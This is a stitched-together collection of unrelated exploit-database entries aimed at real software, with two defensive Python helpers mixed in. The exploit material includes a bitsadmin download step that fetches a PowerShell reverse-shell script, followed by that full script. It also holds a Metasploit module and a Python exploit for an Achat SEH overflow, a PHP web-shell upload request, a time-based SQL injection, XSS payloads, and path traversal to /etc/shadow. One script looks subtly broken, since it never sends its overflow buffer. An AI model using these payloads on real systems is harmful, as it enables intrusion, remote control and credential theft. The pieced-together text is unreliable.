#####################################################################################
Application: Acrobat Reader DC
Platforms: Windows
Versions: 15.008.20082.15957
CVE: CVE-2015-7622
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. The freeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files. The commercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content management and file hosting services.
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
============================
2) Report Timeline
============================
2015-08-09: Francis Provencher of COSIG found the issue;
2015-08-11: Francis Provencher of COSIG reported the vulnerability to PSIRT;
2015-10-13: Adobe released a patch (APSB15-24)
#####################################################################################
============================
3) Technical details
============================
An error in the PDF parser could lead to memory corruption when processing a crafted PDF with an invalid image.
Successful exploitation of the vulnerability may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38787.zip
###############################################################################
Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC
Vendor: Acoustica, Inc.
Product web page: http://www.acoustica.com
Affected version: 1.0 Build 12
Summary: Pianissimo virtual piano uses a combination of sample
playback and advanced physical modeling to create a stunning
acoustic grand piano sound. Starting with 250 MB of high quality
samples of a Steinway™ Model D grand piano, Pianissimo uses
complex signal processing and programming to recreate the warmth,
response, and playability of a real grand piano.
Desc: The vulnerability is caused by a boundary error in the
processing of user input in the registration ID field of the
registration procedure, which can be exploited to cause a buffer
overflow when a user enters a long string for the ID.
Successful exploitation could allow execution of arbitrary code
on the affected machine.
-----------------------------------------------------------------
(b98.1790): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VST\Pianissimo\Pianissimo.dll -
eax=00000000 ebx=532d0245 ecx=bdeec3ea edx=00000049 esi=4a18d43c edi=06c07739
eip=061fbda7 esp=00184a28 ebp=4d2d0276 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000 mov eax,dword ptr [esi+20DCh] ds:002b:4a18f518=????????
0:000> d esp-1000
00183a28 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a38 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a48 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a58 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a68 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a78 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a88 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a98 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:000> u 061fbda7
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000 mov eax,dword ptr [esi+20DCh]
061fbdad 50 push eax
061fbdae 6a30 push 30h
061fbdb0 681cc52c06 push offset Pianissimo!CRefObj::Tell+0x45bfc (062cc51c)
061fbdb5 6810c52c06 push offset Pianissimo!CRefObj::Tell+0x45bf0 (062cc510)
061fbdba e841f8ffff call Pianissimo!CRefObj::SeekToData+0x3980 (061fb600)
061fbdbf 83c410 add esp,10h
061fbdc2 8ac3 mov al,bl
-----------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5243
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5243.php
16.03.2015
--
900 bytes:

11111-11111-11111-11111
#!/bin/sh
#
# Acoem 01dB CUBE Smart Noise Monitoring Terminal
# Remote Password Change
#
# HW version: LIS001A
# Application FW: 2.34
# Metrology FW: 2.10
# Modem FW: 12.00.005 / 08.01.108
#
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ GET "http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>"
source: https://www.securityfocus.com/bid/60010/info
thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks.
www.example.com/../../../../../../../../etc/passwd
www.example.com/../../../../../../../../etc/shadow
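A server-side containment check for request targets like the two above, as an added example (it is not thttpd's code). The document root `/var/www` and the names `resolve_request_path` and `is_contained` are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import unquote, urlsplit

DOCROOT = "/var/www"  # assumed document root, not taken from the advisory


class TraversalError(ValueError):
    """Raised when a request target would resolve outside the document root."""


def resolve_request_path(raw_target, docroot=DOCROOT):
    """Map a request target to a path under docroot, or raise TraversalError."""
    path = urlsplit(raw_target).path
    decoded = unquote(path)
    # Conservative policy: refuse targets that still decode after one pass
    # (double encoding such as %252e%252e) and embedded NUL bytes.
    if unquote(decoded) != decoded or "\x00" in decoded:
        raise TraversalError("suspicious encoding in %r" % raw_target)
    root = posixpath.normpath(docroot)
    # Collapse "." and ".." segments before comparing against the root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError("%r escapes %s" % (raw_target, root))
    # For files on disk, also compare os.path.realpath() of both paths so a
    # symlink inside the root cannot point outside it.
    return candidate


def is_contained(raw_target, docroot=DOCROOT):
    """True when the target stays inside docroot."""
    try:
        resolve_request_path(raw_target, docroot)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed sample targets; the first two mirror the advisory's examples.
    for target in ("/../../../../../../../../etc/passwd",
                   "/../../../../../../../../etc/shadow",
                   "/%2e%2e/%2e%2e/etc/passwd",
                   "/docs/../index.html"):
        print(target, "->", "served" if is_contained(target) else "rejected")
```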
# Exploit Title: Arbitrary Code Execution
# Google Dork: N/A
# Date: 03-07-2018
# Exploit Author: Clutchisback1
# Vendor Homepage: https://www.acl.com
# Software Link: https://www.acl.com/products/acl-analytics/
# Version: 11.x - 13.0.0.579
# Tested on: Windows 7 pro SP1 x86
#########################################################################
#
#
# Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
# Welcome to A_C_SHELLLLLL!!
# All Glory to Yeshua
# Shoutouts to my Mentor: Ch33z_plz for teaching me everyday
# and my Offsec Mentor: T0w3ntum introducing me to netsec!
# (I have consent for those mentions :D)
#
#
#########################################################################
EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
EXECUTE "powershell C:\temp\shell.ps1"
Description/Usage:
Please use the script below to create a reverse shell payload that will be downloaded from your attacking machine and uploaded to the target host by bitsadmin, placed in the target c:\temp directory and saved as shell.ps1.
The second `Execute` command will execute the stored payload.
Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
END
source: https://www.securityfocus.com/bid/51608/info
Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected.
http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
'Description' => %q{
This module exploits a Unicode SEH-based stack buffer overflow in Achat v0.150. By
sending a crafted message to the default port 9256 it's possible to overwrite the
SEH handler. Even though the exploit is reliable, it depends on timing since there are
two threads overflowing the stack at the same time. This module has been tested on
Windows XP SP3 and Windows 7.
},
'Author' =>
[
'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CWE', '121'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'DisableNops' => true,
'Space' => 730,
'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX'
}
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK Windows XP SP3, Windows 7
# Not working on Windows Server 2003
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2014'))
register_options(
[
Opt::RPORT(9256)
], self.class)
end
def exploit
connect_udp
# 0055 00 ADD BYTE PTR SS:[EBP],DL # padding
# 2A00 SUB AL,BYTE PTR DS:[EAX] # padding
# 55 PUSH EBP # ebp holds a close pointer to the payload
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 58 POP EAX # mov eax, ebp
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 05 00140011 ADD EAX,11001400 # adjusting eax
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 2D 00130011 SUB EAX,11001300 # lea eax, eax+100
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 50 PUSH EAX # eax points to the start of the shellcode
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 58 POP EAX # padding
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 59 POP ECX # padding
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
sploit << "\x61\x40" # POPAD + INC EAX
sploit << target.ret # AChat.exe p/p/r address
# adjusting the first thread's unicode payload, tricky asm-fu
# the first seh exception jumps here, first_stage variable will be executed
# by the second seh exception as well. It needs to be in sync with the second
# thread, so that is why we adjust eax/ebp to have a close pointer to the
# payload, then first_stage variable will take the rest of the job.
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 55 PUSH EBP # ebp with close pointer to payload
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 58 POP EAX # put ebp to eax
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
# 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
# 05 00140011 ADD EAX,11001400 # more adjusting
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 2D 00130011 SUB EAX,11001300 # lea eax, eax+100
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 50 PUSH EAX # saving eax
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 5D POP EBP # mov ebp, eax
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
sploit << "\x00" + 'A' * 10 + "\x00"
i = 0
while i < sploit.length do
if i > 172000
Rex::sleep(1.0)
end
sent = udp_sock.put(sploit[i..i + 8192 - 1])
i += sent
end
disconnect_udp
end
end
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
# Exploit Title: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2020-11-26
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 1.2.3500.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Live Updater Service    Live Updater Service    C:\Program Files\Acer\Acer Updater\UpdaterService.exe    Auto
# Service info:
C:\>sc qc "Live Updater Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Live updater Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Acer\Acer Updater\UpdaterService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Live Updater Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during application startup or reboot. If successful, the local user's
code would execute with the elevated privileges of the application.
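An audit helper for the condition described above, as an added example (not part of the original advisory): it reads `sc qc` output, reports the executable names that would be tried ahead of the intended image when the path is unquoted, and prints the quoted form to set instead. The function names and the ".exe followed by a space ends the image" heuristic are assumptions; the sample output is the advisory's own, trimmed.

```python
import re

# `sc qc` output for the service, taken from the advisory above (trimmed).
SC_QC_OUTPUT = r"""
SERVICE_NAME: Live updater Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Acer\Acer Updater\UpdaterService.exe
        SERVICE_START_NAME : LocalSystem
"""


def binary_path(sc_qc_text):
    """Extract the BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", sc_qc_text, re.MULTILINE)
    return m.group(1) if m else None


def split_image(path):
    """Return (image, arguments) for a quoted or unquoted service command line."""
    path = path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        if end == -1:
            return path[1:], ""
        return path[1:end], path[end + 1:].strip()
    # Heuristic (assumption): the image ends at the first ".exe" that is
    # followed by whitespace or the end of the string.
    m = re.match(r"(.+?\.exe)(?=\s|$)(.*)", path, re.IGNORECASE)
    if m:
        return m.group(1), m.group(2).strip()
    return path, ""


def earlier_candidates(path):
    """Executable names tried before the intended image for an unquoted path."""
    if path.strip().startswith('"'):
        return []
    image, _ = split_image(path)
    # Each space inside the image path is a point where the prefix is
    # tried as "<prefix>.exe" before the full path is reached.
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def quoted_form(path):
    """The command line with the image wrapped in double quotes."""
    image, args = split_image(path)
    return '"%s"' % image + (" " + args if args else "")


def audit(sc_qc_text):
    """Summarise one service: is it affected, what to review, what to set."""
    path = binary_path(sc_qc_text)
    candidates = earlier_candidates(path) if path else []
    return {
        "path": path,
        "vulnerable": bool(candidates),
        "candidates": candidates,
        # Directories whose write ACLs decide whether the flaw is reachable.
        "writable_dirs_to_review": [c.rsplit("\\", 1)[0] + "\\" for c in candidates],
        "quoted_form": quoted_form(path) if path else None,
    }


if __name__ == "__main__":
    for key, value in audit(SC_QC_OUTPUT).items():
        print("%-24s %s" % (key, value))
```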
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 22/12/2021
# Vendor Homepage: https://www.accu-time.com/
# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
# Tested Version: 1.0
# Vulnerability Type: Buffer Overflow (DoS) Remote
# Tested on OS: linux
# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow
# Steps to reproduce:
# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
# 2. - Run the Script from remote PC/IP
# 3. - Telnet Crashed
#!/usr/bin/env python3
import socket
import sys
print("#######################################################")
print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #")
print("# -------------------------- #")
print("# BY Yehia Elghaly #")
print("#######################################################")
if len(sys.argv) < 2:
    print("Usage: %s <Target Host> " % sys.argv[0])
    print("Example: %s 192.168.113.1 " % sys.argv[0])
    exit(0)
print("\nSending Evil.......Buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((sys.argv[1], 23))
    buffer = "A"*9400
    s.send(b" Crashed Check the connection")
    print("Crashed")
except:
    print("Could not connect to ACCU Time Telnet!")
# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-16
# Vendor Homepage: https://www.nchsoftware.com
# Source: https://www.nchsoftware.com/accounting/index.html
# Version: Express Accounts Accounting v7.02
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)
# About Express Accounts Accounting v7.02
=========================================
Express Accounts is professional business accounting software, perfect for small businesses.
# Vulnerability
================
Persistent Cross site scripting (XSS).
# PoC
======
1. Log in as an authenticated unprivileged user to the Express Accounts Accounting v7.02 web-enabled service, i.e. http://A.B.C.D:98 [default installation].
2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
Save the change.
or
Under "Sales Orders"
Sales Orders -> view Orders -> Add New Order -> New Sales Order ->Customer: Field put </script><script>alert('XSS');</script>
Save the change.
or
Under "Items"
Items -> Add new item-> Item field: put </script><script>alert('XSS');</script>
Save the change.
or
Under "Customers"
Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script>
Save the change.
or
Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script>
Save the change.
3. Log in as an authenticated privileged or unprivileged user to the Express Accounts v7.02 web-enabled service and visit any of the Invoices/Sales Orders/Items/Customers/Quotes sections; the persistent XSS payload will execute.
# Disclosure Timeline
======================
Vulnerability Discovery Date: 15-Sep-2019.
Vulnerability notification to vendor via vendor-provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no response.
Submitted to exploit-db: 16-Oct-2019.
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
# Version : 1.0
# Tested on: windows 10 xammp | Kali linux
# Category: WebApp
# Google Dork: N/A
# Date: 09.02.2022
######## Description ########
#
#
# Authenticate and open the update user settings page; the
# id parameter appears in the request. Put your payload there.
#
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
Upgrade-Insecure-Requests: 1
# Exploit Title: Unauthenticated Arbitrary File Upload
# Date: November 12, 2017
# Exploit Author: Colette Chamberland
# Author contact: colette@defiant.com
# Author homepage: https://defiant.com
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446
# Version: < 3.2.0
# Tested on: Wordpress 4.x
# CVE : CVE-2017-16949
Description:
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows
the attacker to upload anything they want, bypassing the filters.
PoC:
POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host:server
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6;
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
-----------------------------7230359611602921801124357792--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt
Vendor:
==============
M. Jean Fages
www.accessdiver.com
circa 1998-2006
Product:
=============================
AccessDiver V4.301 build 5888
AccessDiver is a security tester for Web pages. It has got a set of tools which
will verify the robustness of your accounts and directories. You will know if your
customers, your users and you can use safely your web site.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AccessDiver is vulnerable to multiple buffer overflows; two vectors are described below.
1) Buffer overflow @ 2073 bytes in the URL field for Server / IP address, which
will overwrite the NSEH and SEH exception handlers.
EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252 <----------------- BOOM
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1272 Prec NEAR,53 Mask 1 1 0 0 1 0
2) Buffer overflow when loading a malicious "Exploit zone file" text file containing 2080 bytes:
load the text file from the "Weak History" menu, choose Import "from File", choose the exploit text file and BOOM!
EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242 <----------------- KABOOM
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0
Windbg dump...
(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000 edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
52525252 ?? ???
Disclosure Timeline:
=====================================
Vendor Notification: NA
December 26, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
